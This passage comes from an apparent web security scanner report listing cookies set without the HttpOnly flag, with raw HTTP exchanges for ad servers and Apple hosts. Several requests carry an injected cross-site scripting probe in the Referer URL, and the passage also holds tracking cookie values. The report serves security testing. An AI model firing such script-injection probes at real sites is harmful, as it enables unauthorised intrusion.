GIF89a.............!.......,...........D..;

14.54. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087498154&cv=6&fst=1311087498154&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:58:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: id=22048e84020100ee||t=1311087492|et=730|cs=002213fd4810efdd35c9315ece; expires=Thu, 18-Jul-2013 14:58:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

14.55. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1071926901/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/viewthroughconversion/1071926901/?random=1311087443803&cv=6&fst=1311087443803&num=1&fmt=3&value=0&label=arLzCN3WggIQ9ZyR_wM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=0&u_tz=-300&u_nplug=0&u_nmime=0&url=about%3Ablank&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: googleads.g.doubleclick.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 19 Jul 2011 14:57:18 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: image/gif
Set-Cookie: test_cookie=CheckForPermission; expires=Tue, 19-Jul-2011 15:12:18 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 42
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D.;

14.56. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686170_0.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homepage.mac.com
Path:   /jstg674/Sites/iSale/Pictures/1310686170_0.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jstg674/Sites/iSale/Pictures/1310686170_0.jpg HTTP/1.1
Host: homepage.mac.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: AppleIDiskServer.1G301009
x-responding-server: hpng010-0
X-dmUser: jstg674
Cache-Control: max-age=60, must-revalidate
ETag: "c-1g3s18hn-1bnp-chfykqkp1-27t4kczenv0"
Last-Modified: Thu, 14 Jul 2011 23:29:38 GMT
Content-Type: image/jpeg
Content-Length: 149590
Date: Tue, 19 Jul 2011 18:35:31 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........#.$acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

14.57. http://homepage.mac.com/jstg674/Sites/iSale/Pictures/1310686178_1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homepage.mac.com
Path:   /jstg674/Sites/iSale/Pictures/1310686178_1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jstg674/Sites/iSale/Pictures/1310686178_1.jpg HTTP/1.1
Host: homepage.mac.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: AppleIDiskServer.1G301009
x-responding-server: hpng014-0
X-dmUser: jstg674
Cache-Control: max-age=60, must-revalidate
ETag: "c-1g3s18hn-1vdp-chfykqkp1-27t4kczenv0"
Last-Modified: Thu, 14 Jul 2011 23:29:44 GMT
Content-Type: image/jpeg
Content-Length: 193128
Date: Tue, 19 Jul 2011 18:35:31 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/jstg674

......JFIF..............ICC_PROFILE.......appl....mntrRGB XYZ .........#.$acspAPPL...................................-appl................................................desc...P...bdscm........cprt..
...[SNIP]...

14.58. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=beeaba0f-bbae-41f9-a021-0d36561089d9 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/BING_ENGAGEMENT_DISCOVERBING_GLOBAL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322; sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734293&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734323&11206=734324&7382=734325&11095=734330; domain=.interclick.com; expires=Mon, 19-Jul-2021 15:16:57 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 19 Jul 2011 15:16:57 GMT

GIF89a.............!.......,...........D..;

14.59. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE5OTYmdGw9MTAwODA= HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; KRTBCOOKIE_57=476-uid:7212282717808390200; PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; KRTBCOOKIE_22=488-pcv:1|uid:3698952182471149434

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:06 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1403859781.2114_1324986886.1996_1311621009.82_1405624242; domain=pubmatic.com; expires=Thu, 17-Jul-2014 19:10:42 GMT; path=/
Content-Length: 42
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

14.60. http://images.apple.com/global/nav/scripts/globalnav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 21 Apr 2011 20:13:41 GMT
If-None-Match: "6e6f-4a173609c2740"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Cache-Control: max-age=356
Expires: Tue, 19 Jul 2011 18:56:37 GMT
Date: Tue, 19 Jul 2011 18:50:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=eKwIcPZgJHsw/8hbkWk9NfbHjaEfvezhpVDm9O8an1EjF8hLQjxhpUGXNk+TIL7iWWOIrci6QZbyox1vAlXFVihrt8rDm2O1C6WZLWbAaeFfFc7jmCkxXgIJaupEJRaY6NgELLxXeKF6EFrxpC7vR5zyxY1a4A3pO+U0y8n9QBs3xRZfEwZgN9+DCPhXS98jOpRP7LpdSOv2oPnk8imbvq0cQipmLUkqb4k/+DxDtbStL1gFEy4RIwc2KInyZBbJTTULrcNK344YNZQOBNahULD1xr0ZcBZuhC5lRSS+hbELGgk0olyljSa4egdnMaJfinm6RL25YdaJ0dnV06Zyy+AHGuS35bhCQUMkT6XaneeJ/deVwipi4jmBu0ZUjOukjt15yG/+Z/DVtLPltA7trg0BnR+smGw+vCc1PTuMBLhsnRKdF9q7TVZPFLMsXPy7DRG/9FOpNiW6ByUXJh8RgVGxqTBDP8GgLVcbjQDZ/IlZJXnQOajXAhKlz9efbW//nt1FnB+h0mxLTQ1q+LO/zePTWbXI3IlzV1FTThIKOC19AyDmCBQUmUkMEDKnmJ8E; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.61. http://images.apple.com/global/nav/styles/navigation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT
If-None-Match: "2930-4a3055a8a0000"

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=371
Expires: Tue, 19 Jul 2011 18:56:51 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=QdtF1drqHnVlSB+HwBLvnZMiEH6obQO+cu9Z/v2U4XKn7rs0v9NnOT8WpKGzWszZlmje/F2XWEPjpKcWLnxgaqw4+z0GeGzRkZ9NOc/XiCNPPBXvTsfWU/g93BDPgA5zkECn2p9RSPgnJEs58xCAf8Cyl5p8pL4q0s5Aprv3Hs42UW70Bq0TWB0AbW4MKqf0HabQXZ+JvBhnCX2ORQFO2SJmDWUxjUkeeXAtgAUN5hIVdywMaWSem8rwn+z7IrWlTS/hxGAGzAZE8P/DWcNTgVmHWuZYsNMed65Ys0NGnEexIGgeNdPrLu2Mqi1suK7HER0VT6wkB9Kwf1Cz4qdD2Y6ZyKYHSnAYTn0P4ENkkZnV0fK7QYR5TLqAMO21fhZjuKqoVUVyYY6Qa4AUEikaRwSSGj0PQn0LhG7Waf8R398H2av/rJYZxvilwDxaDMZY2Y2ok/AFZpf0uBMPk9+1hKXcD6060vM7LXdbkrcPWkzwdvbpK+RHINHLtSVt6HMqGCAdX4NakPCikSyRX6v1+sF3E8CWlp5sb00mun82sVBkihULVVRPk9DdFPGZhes2; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.62. http://images.apple.com/global/scripts/apple_core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT
If-None-Match: "52da-4a36ce1818580"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=364
Expires: Tue, 19 Jul 2011 18:56:44 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=m9/CPkw5LYIvCVzI84KswFfsTPWQTIJawwQIZs9o2PB0TBT1ovgy3ln6NmgFVXWxe28ZkpzYNgIOieP+3eWkJAxVytLayQ1tfgMcX6DRdUmAnmimWKGqd1xzwenJEayZwv7uxmhSF3CLrp93uSRC4YAAo8gcHB6esH9FOaxBi4Flva6z29KPIxWB7aWVfwK2AKRb4ZCDECK/uY3+TvkeJeYH5GbI/qWQEudByrxnPrDLhuhhyWCvk+8ARqzhXx5rlLcRqDZbVkEN6MgXCE6VIleRIOzVcf8J9TlQ/WwKlsu3VInW+sFCFQcJve8SUEbn+2GSz2o4ZnWqP0VnTvJAfyRsLxqbEMtCt29XklyX2RYPUMNix5b/oCM/cW4vKZfJT1Y9vGXe0Fjvva6FucMUCdROvPiCeFfQKEQv6GlbBv6I58Od4d6gv9Qh9/PMPhmzbNRdfR+EREc/ZOaKdVdHWAQB6kgbzc+xtEev6d2e5xvlYpQO/MuQLYnWwIRc3zu7hyz4n2T+tx27XrIVxumLBYm7MT7koJZi7SrwP50EfcHb+NaXkzPal8ObUbigg59I; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.63. http://images.apple.com/global/scripts/browserdetect.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT
If-None-Match: "25fd-4a4e72621e9c0"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=524
Expires: Tue, 19 Jul 2011 18:59:24 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=W9d+P/weFqXFr6H8nSQrFNjrX108Oe5VqptvfEBzDpvj68l+vIceQs0teSQaTJ2djpwcgjtR7a+Mxj5YgWVADoEk5u0RQjgnZEVBo3iTA57e3UARWFfTplsk3U6C5f7uX6Mo4Nr1OLUNearzGAZ2qAVp1s55m45QcPHq6T7rhJ6m8lzGcTv9INR0f72zHNlk/M0vXA4TsCidLkg639JfMpJgNuNE1Z5UQj/JRfdFAVHq51xfp0n8+cAXYl7s+e4hNqrCWONWevzft2zI65Hcnnc4FcKlwNe+u5BCmi9Mj3anmM2oAHjs2GJPNPwhULU5DsUKSa6duqb+SxJ1ryW1aOPfPe+Po2zxh0fHYIMN3DPkf8uAtycmQGsMpDKG1MEf0h+bg3hhvqDeHqnMdlKdd2mnZM/fBUoAkdMK3MJkx4BysVjUzu5dFAyx3QsB+0GgSKBUc/IGUlBIyEW4OBiK6gPf85aoUMR9CLeU47799FK23u4kbVxYSYQIlMtN4LqZRfteAXVJLMdyEM5uT6fEByeDHgwtljUe44mrZNHWePZM4qeLDoVKQXnQI89j2bpl; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


14.64. http://images.apple.com/global/scripts/content_swap.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/content_swap.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/content_swap.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
